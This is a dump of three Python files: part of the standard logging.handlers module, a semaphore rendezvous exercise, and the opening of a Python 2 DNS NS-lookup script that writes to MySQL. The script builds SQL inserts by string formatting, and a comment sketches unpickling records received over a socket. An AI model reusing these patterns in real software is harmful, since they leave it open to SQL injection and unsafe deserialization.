logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
        When the attribute *closeOnError* is set to True and a socket error
        occurs, the socket is silently closed and then reopened on the next
        logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
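    # Receiver-side sketch for the framing above (assumes a connected stream
    # socket `conn`; a robust reader would loop until all bytes arrive):
    #   slen = struct.unpack(">L", conn.recv(4))[0]
    #   record = logging.makeLogRecord(pickle.loads(conn.recv(slen)))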
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
LOG_NTP = 12 # NTP subsystem
LOG_SECURITY = 13 # Log audit
LOG_CONSOLE = 14 # Log alert
LOG_SOLCRON = 15 # Scheduling daemon (Solaris)
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"console": LOG_CONSOLE,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"ntp": LOG_NTP,
"security": LOG_SECURITY,
"solaris-cron": LOG_SOLCRON,
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
self.socket = None
self.createSocket()
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def createSocket(self):
address = self.address
socktype = self.socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it is no
# worse to ignore them here as well.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
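# Worked example (added note): the syslog PRI value is facility*8 + priority,
# e.g. facility LOG_USER (1) with priority "err" (3) gives (1 << 3) | 3 == 11,
# which appears on the wire as "<11>".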
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.socket
if sock:
self.socket = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if not self.socket:
self.createSocket()
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
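# Usage sketch (added; not part of the original module). A minimal example,
# assuming a local syslog daemon is listening on /dev/log:
#
#   import logging
#   h = SysLogHandler(address='/dev/log')
#   log = logging.getLogger('demo')
#   log.addHandler(h)
#   log.error('disk failure')   # emitted with PRI <11>, i.e. user.err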
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is 5 seconds).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def getConnection(self, host, secure):
"""
get a HTTP[S]Connection.
Override when a custom connection is required, for example if
there is a proxy.
"""
import http.client
if secure:
connection = http.client.HTTPSConnection(host, context=self.context)
else:
connection = http.client.HTTPConnection(host)
return connection
def emit(self, record):
"""
Emit a record.
Send the record to the web server as a percent-encoded dictionary
"""
try:
import urllib.parse
host = self.host
h = self.getConnection(host, self.secure)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
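# Usage sketch (added; not part of the original module). The host and path
# below are placeholders for an endpoint that accepts form-encoded records:
#
#   import logging
#   h = HTTPHandler('example.com:8080', '/log', method='POST')
#   log = logging.getLogger('web')
#   log.addHandler(h)
#   log.warning('slow response')   # sent as record.__dict__, percent-encoded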
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.acquire()
try:
self.target = target
finally:
self.release()
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
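# Usage sketch (added; not part of the original module): buffer low-severity
# records in memory and flush them to a file only once an ERROR occurs.
#
#   import logging
#   target = logging.FileHandler('app.log')
#   mem = MemoryHandler(capacity=100, flushLevel=logging.ERROR, target=target)
#   log = logging.getLogger('buffered')
#   log.addHandler(mem)
#   log.debug('step 1')   # buffered only
#   log.error('boom')     # reaches flushLevel, flushes the whole buffer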
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy-pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepare a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message and
arguments, and removes unpickleable items from the record in-place.
Specifically, it overwrites the record's `msg` and
`message` attributes with the merged message (obtained by
calling the handler's `format` method), and sets the `args`,
`exc_info` and `exc_text` attributes to None.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
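# Usage sketch (added; not part of the original module): pair QueueHandler
# with QueueListener so emitting threads never block on slow I/O.
#
#   import logging, queue
#   q = queue.Queue()
#   listener = QueueListener(q, logging.StreamHandler())
#   log = logging.getLogger('worker')
#   log.addHandler(QueueHandler(q))
#   listener.start()
#   log.info('hello')   # handled on the listener's internal thread
#   listener.stop()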
|
rendezvous.py
|
import threading
#global N
N = 5
count = 0
guard = threading.Semaphore(1)
turnstile1 = threading.Semaphore(0)
turnstile2 = threading.Semaphore(1)
def rendezvous():
'''The guard semaphore lets only one thread increment count at a time.
The first N-1 threads to hit turnstile1.acquire() block; the Nth thread
unlocks one, which immediately unlocks another, successively letting all pass.'''
global count
for i in range(5):
#print('Round {}'.format(i))
#time.sleep(.1)
guard.acquire()
count += 1
if count == 1:
print('{} thread is ready'.format(count))
else:
print('{} threads are ready'.format(count))
if count == N:
turnstile2.acquire()
turnstile1.release()
guard.release()
turnstile1.acquire()
turnstile1.release()
# Count the threads back out; turnstile1 is locked again once all N are through
#Here is where timing-sensitive code would go
guard.acquire()
count -= 1
if N - count == 1:
print('{} thread through'.format(N-count))
else:
print('{} threads through'.format(N-count))
if count == 0:
turnstile1.acquire()
print('No more shall pass this round')
print('')
turnstile2.release()
guard.release()
turnstile2.acquire()
turnstile2.release()
thread1 = threading.Thread(target=rendezvous)
thread2 = threading.Thread(target=rendezvous)
thread3 = threading.Thread(target=rendezvous)
thread4 = threading.Thread(target=rendezvous)
thread5 = threading.Thread(target=rendezvous)
thread1.start()
thread2.start()
thread3.start()
thread4.start()
thread5.start()
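# Note (added): on Python 3.2+ the reusable two-turnstile barrier above can be
# replaced by threading.Barrier; a minimal equivalent sketch:
#
#   barrier = threading.Barrier(N)
#   def rendezvous_with_barrier():
#       for i in range(5):
#           barrier.wait()   # all N threads block until the last one arrives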
|
obtaining_domain_ns_realtime.py
|
# encoding:utf-8
"""
Query a domain's NS records from both the TLD authoritative servers and
recursive DNS servers, then update the results in batch.
Note: two methods are used to fetch NS records because neither method
alone retrieves the complete NS record set.
"""
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append('../')
import threading
import time
import random
import datetime
import hashlib
from Queue import Queue
from threading import Thread
from collections import defaultdict
from resolving_domain_ns_by_tld import get_domain_ns_hierarchical_dns # fetch a domain's NS records
from db_manage.data_base import MySQL
from db_manage.mysql_config import SOURCE_CONFIG_LOCAL as SOURCE_CONFIG
import tldextract
from resolving_domain_ns_by_ns import query_domain_ns_by_ns # fetch a domain's NS records
from resolving_ip_cname_by_ns import query_ip_cname_by_ns
from Logger import Logger
from task_confirm import TaskConfirm
domain_ns_result = {} # stores the final NS results
retry_domains = [] # domains (and their main domains) that need a second probe
thread_num = 50 # number of primary worker threads
retry_thread_num = 30 # number of retry worker threads
queue = Queue() # task queue
logger = Logger(file_path='./query_log/',show_terminal=True) # logging configuration
class NSubThread(threading.Thread):
"""Custom thread class that exposes its target's return value."""
def __init__(self,func,args=()):
super(NSubThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result # if the thread has not been join()ed, self.result may not exist yet
except Exception as e:
logger.logger.error('Failed to get thread result: %s' % str(e))
return [], 'FALSE'
def read_domains(file_name):
"""
Read the domain file, collect the domains to probe, and extract their main domains.
Note: domains that do not conform to the spec are discarded.
"""
domains = []
main_domains = []
no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)
file_name = './unverified_domain_data/'+file_name
with open(file_name,'r') as fp:
for d in fp.readlines():
domain_tld = no_fetch_extract(d.strip())
tld, reg_domain = domain_tld.suffix, domain_tld.domain # extract the TLD and registered-domain parts
if tld and reg_domain:
main_domains.append(reg_domain+'.'+tld)
domains.append(d.strip())
else:
logger.logger.warning('Domain %s is malformed; skipping probe' % d.strip())
return domains, main_domains
def insert_domains_db(domains):
"""Insert the domains into the database."""
try:
db = MySQL(SOURCE_CONFIG)
except Exception as e:
logger.logger.error(e)
return False
for domain in domains:
sql = 'insert ignore into focused_domain (domain) values ("%s")' % (domain)
db.insert_no_commit(sql)
db.commit()
db.close()
return True
def extract_domain_tld(domain):
"""
Extract the top-level domain of a domain.
Note: returns empty for malformed domains.
"""
no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)
domain_tld = no_fetch_extract(domain)
tld = domain_tld.suffix
